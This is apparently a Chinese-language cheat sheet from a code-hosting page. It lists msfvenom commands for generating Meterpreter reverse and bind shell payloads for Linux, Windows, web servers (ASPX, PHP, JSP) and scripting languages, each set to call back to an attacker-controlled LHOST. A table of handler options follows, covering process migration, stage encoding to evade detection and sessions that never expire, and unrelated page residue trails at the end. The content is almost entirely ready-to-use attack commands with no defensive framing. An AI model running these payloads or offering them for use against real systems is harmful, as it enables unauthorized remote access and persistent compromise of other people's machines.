CATALOG

1.常用生成载荷命令

1.1 生成linux系统反向shell载荷

  1. 生成elf可执行文件的反向连接载荷
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=111 -f elf > ~/Desktop/1.elf

1.2 生成windows系统载荷

  1. 反向shell(tcp)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=111 -f exe > ~/Desktop/1.exe
  1. 正向shell(tcp)
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9991 -f exe > ~/Desktop/1.exe
  1. 反向shell(https)
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.123 LPORT=443 -f exe > ~/Desktop/1.exe
  1. dll类型
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=111 -f dll > ~/Desktop/1.dll

1.3 生成web类型载荷

此种载荷的触发方式为使用浏览器访问

  1. 生成aspx载荷
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.111 LPORT=443 -f aspx > ~/Desktop/1.aspx
  1. 生成php载荷
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.111 LPORT=443 -f raw > ~/Desktop/1.php
  1. 生成jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.111 LPORT=443 -f raw > ~/Desktop/1.jsp

1.4 生成语言类载荷

  1. python
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.111 LPORT=443 -f raw > ~/Desktop/1.py
  1. lua
msfvenom -p cmd/unix/reverse_lua LHOST=192.168.1.111 LPORT=443 -f raw > ~/Desktop/1.lua
  1. perl
msfvenom -p cmd/unix/reverse_perl LHOST=192.168.1.111 LPORT=443 -f raw > ~/Desktop/1.pl
  1. ruby
msfvenom -p cmd/unix/reverse_ruby LHOST=192.168.1.111 LPORT=443 -f raw >  ~/Desktop/1.rb
  1. bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.111 LPORT=443 -f raw >  ~/Desktop/1.sh
  1. powershell
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.111 LPORT=443 -f psh-reflection >  ~/Desktop/1.ps1

2.常见高级参数

这些参数一般在生成web_delivery_payload或者使用exp攻击的时候有可能会用到:

参数字段效果
set PrependMigrate true启用迁移进程(默认为:false)
set PrependMigrateProc explorer.exe迁移到此进程名:explorer.exe
set SessionExpirationTimeout 0会话超时时间0秒(会话永不超时),默认为:604800
set SessionCommunicationTimeout 0会话通信超时0秒(会话永不过期),默认为:300
set EnableStageEncoding true启用Stage传输体载荷编码(默认为:false)
set EnableUnicodeEncoding true启用Unicode编码(默认为:false)
set stageencoder x86/fnstenv_mov设置传输编码为:x86/fnstenv_mov
set HandlerSSLCert /tmp/772023.pem指定HTTPS PEM格式SSL证书路径
set StagerVerifySSLCert true验证HTTPS SSL证书
set ExitOnSession false退出会话为:false,保持端口监听(默认为:true)
set AutoRunScript migrate -f自动运行migrate脚本,-f或-n参数
set InitialAutoRunScript migrate -f自动运行migrate脚本,优先AutoRunScript
# 安全
GitHub 加速计划 / li / linux-dash
6
1
下载
A beautiful web dashboard for Linux
最近提交(Master分支:4 个月前 )
186a802e added ecosystem file for PM2 4 年前
5def40a3 Add host customization support for the NodeJS version 4 年前
Logo
GitCode 开源社区

旨在为数千万中国开发者提供一个无缝且高效的云端环境,以支持学习、使用和贡献开源项目。

更多推荐

[转载]在Windows环境下安装GNU Radio

转自:在Windows环境下安装GNURadio_恐弱智_新浪博客GNU Radio是用Python开发的,大部分开源的工程能够在Linux环境下运行良好,而Windows下却运行的很勉强,而且安装配置都很复杂。GNU Radio算是个例外了,不光提供了Windows的二进制安装,还有比较详细的说明。我是Python小白,所以折腾了好久才弄好,特意记录下来,免得以后再装还折腾。GNU Radio的

avatar GitCode 开源社区
cover

2025 GitCode 开发者冬日嘉年华:AI 与开源的深度交融之旅

avatar GitCode 开源社区
cover

GitCode 光引计划投稿 | GoIoT:开源分布式物联网开发平台

avatar GitCode 开源社区